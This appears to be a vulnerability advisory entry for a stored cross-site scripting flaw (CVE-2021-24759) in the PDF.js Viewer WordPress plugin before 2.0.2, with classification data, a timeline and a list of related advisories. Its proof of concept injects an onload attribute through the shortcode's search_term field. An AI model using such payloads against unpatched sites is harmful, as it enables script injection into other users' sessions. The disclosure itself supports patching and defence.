PDF.js Viewer < 2.0.2 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24759 | Plugin Vulnerabilities

Description

The plugin does not escape some of its shortcode and Gutenberg Block attributes, which could allow users with a role as low as Contributor to to perform Cross-Site Scripting attacks

Proof of Concept

[pdfjs-viewer search_term='" onload="alert(/XSS/)']

<!-- wp:pdfjsblock/pdfjs-embed {"searchText":"this is ignored"} -->
<div class="wp-block-pdfjsblock-pdfjs-embed pdfjs-wrapper">[pdfjs-viewer viewer_width=0 viewer_height=800 url=undefined download=true print=true fullscreen=false fullscreen_target=false fullscreen_text="on" zoom=0 search_term='" onload="alert(/XSS/)' ]</div>
<!-- /wp:pdfjsblock/pdfjs-embed -->

Affects Plugins

pdfjs-viewer-shortcode

Fixed in 2.0.2

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

38274ef2-5100-4669-9544-a42346b6727d

Timeline

Publicly Published

2021-11-08 (about 4 years ago)

Added

2021-11-08 (about 4 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2023-10-16

Title

bbp style pack < 5.6.8 - Contributor+ Stored XSS

Published

2015-04-20

Title

Related Posts < 1.8.2 - XSS

Published

2024-09-30

Title

Logo Carousel – Clients logo carousel for WP < 1.3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-12-31

Title

Audiomack <= 1.4.8 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-09-26

Title

WP Statistics < 14.15.5 - Unauthenticated Stored XSS via User-Agent Header